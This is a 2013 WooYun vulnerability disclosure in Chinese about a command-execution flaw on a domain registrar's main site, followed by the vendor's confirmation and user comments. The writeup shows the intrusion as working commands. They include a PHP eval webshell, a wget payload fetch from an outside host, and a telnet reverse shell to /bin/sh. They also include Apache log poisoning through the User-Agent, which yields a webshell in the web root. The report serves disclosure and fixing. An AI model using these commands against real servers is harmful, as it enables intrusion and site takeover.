当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026945

漏洞标题:新网互联主站命令执行漏洞主站沦陷(非struts漏洞)

相关厂商:北京新网互联科技有限公司

漏洞作者: 瞌睡龙

提交时间:2013-06-26 12:28

修复时间:2013-08-10 12:28

公开时间:2013-08-10 12:28

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-26: 细节已通知厂商并且等待厂商处理中
2013-06-27: 厂商已经确认,细节仅向厂商公开
2013-07-07: 细节向核心白帽子及相关领域专家公开
2013-07-17: 细节向普通白帽子公开
2013-07-27: 细节向实习白帽子公开
2013-08-10: 细节向公众公开

简要描述:

主站的命令执行~嗷

详细说明:

一处犀利的命令执行

xw1.jpg


pwd看向当前网站路径:
/home/member/www/live/domainv2
找是否有可写目录:

xw2.jpeg


果断写shell啊
echo "<?php eval(\$_POST[l])?>" > /home/member/www/livehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/111.php
cat下看看
cat /home/member/www/livehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/111.php

xw3.jpeg


妈蛋的什么都没有,什么情况,可能有特殊字符过滤了,继续黑盒测试。
换wget再试试:
wget http://bluetest.duapp.com/eval.txt -O /home/member/www/livehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/zzz.php
依然失败。
linux一条命令直接反弹端口回来试下:
telnet x.x.x.x 1111 | /bin/sh | telnet x.x.x.x 2222

xw4.jpeg


发现弹回来了,但是会马上断开连接,后来才知道FreeBSD的是Unix的不支持这种。。。

xw5.jpeg


把shell写进系统里,然后mv到web目录下试试~
试一下apache日志的方式
进程中找到apache的路径
ps -aux
找到apache配置文件
cat /usr/local/apache/conf/httpd.conf
找到日志地址
tail -100 /usr/local/apache/logs/access_log

xw6.jpeg


把浏览器UA改成
<?php eval($_POST[l]);?>
然后tail几遍看看日志

xw7.jpeg


干的漂亮,导出到web目录试试~
tail -1000 /usr/local/apache/logs/access_log > /home/member/www/livehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/a.php
访问一下a.php:

xw8.jpeg


一句话连接
http://www.dns.com.cnhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/a.php

xw9.jpeg


你也可以试下grep出eval来导出大小会小很多,不过1000行还好~
看了下/var/log目录下的一些日志文件:
检查新生成php文件
/var/log/find_new_php.log
检查危险函数
/var/log/check_dangerous.log
监控做的挺好,但是检查出的那么多危险函数怎么就不管了呢~

漏洞证明:

修复方案:

正则匹配严格些,逻辑上别出问题。

版权声明:转载请注明来源 瞌睡龙@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-06-27 09:26

厂商回复:

问题已经确认,并修复了。太郁闷了,2次死在同一个沟里。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-06-26 12:32 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    岂不是又可以劫持土豆了?

  2. 2013-06-26 12:33 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    非struts...亮了

  3. 2013-06-26 12:34 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    围观

  4. 2013-06-26 12:35 | HuGtion ( 实习白帽子 | Rank:70 漏洞数:10 | 学习安全技术。)

    新网互联....

  5. 2013-06-26 12:36 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:182 | 没有最专业的农民,只有更努力地耕耘..........)

    @Finger 土豆怎么还没有域名转移

  6. 2013-06-26 12:42 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @专业种田 这个你得问土豆

  7. 2013-06-26 12:43 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    万网、新网、时代互联、新网互联 下一个会是谁?

  8. 2013-06-26 13:15 | ╰╃清風 ( 实习白帽子 | Rank:89 漏洞数:9 | 这家伙很懒,什么都没有留下)

    亮了

  9. 2013-06-26 13:18 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    菇凉,菇凉,你真棒!

  10. 2013-06-26 13:30 | GrayTrack ( 实习白帽子 | Rank:75 漏洞数:14 | 灰色轨迹)

    又能淫荡一下了

  11. 2013-06-26 14:19 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    龙哥好牛逼

  12. 2013-06-26 14:46 | 8点半 ( 路人 | Rank:16 漏洞数:5 | 你当哥是CPU啊,人生价值就是执行指令?)

    睡觉了

  13. 2013-06-26 15:03 | 紫气东来 ( 路人 | Rank:24 漏洞数:1 | xxx)

    非struts漏洞?如果说是的j2ee应用的话,不是struts2框架,那只有webwork或spring了,或者使用了OGNL的web框架。我猜是webwork框架,它的漏洞一直被struts2所掩盖了!

  14. 2013-06-26 15:53 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    哇哦,又可以劫持了?

  15. 2013-06-26 16:28 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @redrain有节操 为什么要说又呢

  16. 2013-06-26 17:25 | 慕林 ( 路人 | Rank:16 漏洞数:1 | 好钻研, 爱安全)

    @紫气东来 这个新网互联跟新网是不是一回事?

  17. 2013-06-26 17:54 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    洞主大大---mark

  18. 2013-06-27 00:56 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    @Finger 要不。。中国互联

  19. 2013-06-27 13:03 | 优酷(乌云厂商)

    新网是国内出名的只许进不许出,你想转移哪有那么容易.....

  20. 2013-06-27 13:04 | dyun ( 普通白帽子 | Rank:102 漏洞数:15 | [code][/code])

    @优酷 后悔了吧...

  21. 2013-06-27 16:30 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @优酷 国内域名注册商都差不多 不用转来转去的了 没意义

  22. 2013-06-27 18:06 | Sct7p ( 实习白帽子 | Rank:62 漏洞数:9 | 懂与不懂之间只隔了一层纸,懂的人会觉得很...)

    @新网互联 其实这些大企业的域名可以给他们提供"特殊服务",尽量让数据不要裸奔在网上

  23. 2013-06-27 23:58 | Aepl│恋爱 ( 实习白帽子 | Rank:45 漏洞数:15 | Forzen恋爱-不要做你的Guest 只想做的你adm...)

    @新网互联 @Sct7p 你看吧 经过土豆的事情 这些大企业域名会慢慢转出的

  24. 2013-06-28 11:45 | Sct7p ( 实习白帽子 | Rank:62 漏洞数:9 | 懂与不懂之间只隔了一层纸,懂的人会觉得很...)

    @Aepl│恋爱 万网的域名认证机制还是比较完善的。要选就选万网吧。认证机制特别复杂

  25. 2013-06-28 14:10 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    新网互联的礼物已收到 很不错 谢啦

  26. 2013-06-28 17:02 | Leon ( 路人 | Rank:25 漏洞数:6 | 永无宁日啊)

    @Finger 呵呵 这么快,

  27. 2013-06-28 18:10 | Sct7p ( 实习白帽子 | Rank:62 漏洞数:9 | 懂与不懂之间只隔了一层纸,懂的人会觉得很...)

    @Finger 我也收到了不错

  28. 2013-07-17 09:38 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    膜拜高手,求带啊~

  29. 2013-07-17 11:05 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:182 | 没有最专业的农民,只有更努力地耕耘..........)

    域名查询处还能这样,服了。

  30. 2013-07-27 10:54 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    这里还能命令执行,什么样的逻辑,直接nslookup了?后面的分析也很精彩。

  31. 2013-07-29 15:37 | lion(lp) ( 普通白帽子 | Rank:115 漏洞数:14 | 本人菜。。。千年实习白帽子)

    牛逼~~ 佩服

  32. 2013-07-30 05:24 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    这思路牛逼

  33. 2013-08-10 12:40 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    我去,高端大气

  34. 2013-08-10 13:33 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    这种低级漏洞很多WHOIS、Looking Glass程序都出现过。

  35. 2014-03-09 11:15 | c4bbage ( 路人 | Rank:15 漏洞数:7 | var_dump($me);)

    佩服

  36. 2014-05-09 12:37 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    无语,这个漏洞花了好多的文章,不错!